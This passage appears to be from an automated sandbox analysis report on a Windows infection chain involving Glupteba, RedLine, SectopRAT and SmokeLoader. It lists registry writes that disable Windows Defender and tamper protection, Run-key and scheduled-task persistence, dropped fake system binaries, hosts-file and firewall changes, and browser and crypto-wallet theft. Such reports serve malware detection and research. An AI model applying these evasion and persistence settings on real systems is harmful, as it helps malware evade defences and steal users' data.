Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Glupteba

loader dropper glupteba

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1gi83ps6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1gi83ps6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1gi83ps6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1gi83ps6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\514C.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1gi83ps6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1gi83ps6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\514C.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\514C.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\514C.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\514C.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\System32\cmd.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\83BC.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\5227.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OT2If21.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oL5RR46.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rD0hz63.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ka4yh75.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1gi83ps6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2oB5870.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3sO37sU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ql522dO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4D7F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4E4B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\xN8VP0Pk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\PO0GY9Kh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5051.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\nR7Ki5xF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\514C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\xa9dg5Dd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\1dx01lH8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5227.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\548A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5556.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\568F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\2MM263Ua.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6045.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\83BC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8BBC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9A63.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9E3C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Uses the VBS compiler for execution

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1gi83ps6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\514C.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1gi83ps6.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\PO0GY9Kh.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ka4yh75.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\4D7F.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\xN8VP0Pk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup7 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP007.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\xa9dg5Dd.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\9A63.exe'\"" C:\Users\Admin\AppData\Local\Temp\9A63.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\OT2If21.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\oL5RR46.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rD0hz63.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup6 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP006.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\nR7Ki5xF.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Detected potential entity reuse from brand microsoft.

phishing microsoft

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4700 set thread context of 2132 N/A C:\Users\Admin\AppData\Local\Temp\6045.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 5192 set thread context of 5664 N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3sO37sU.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3sO37sU.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3sO37sU.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2061 = "North Korea Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2941 = "Sao Tome Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1861 = "Russia TZ 6 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
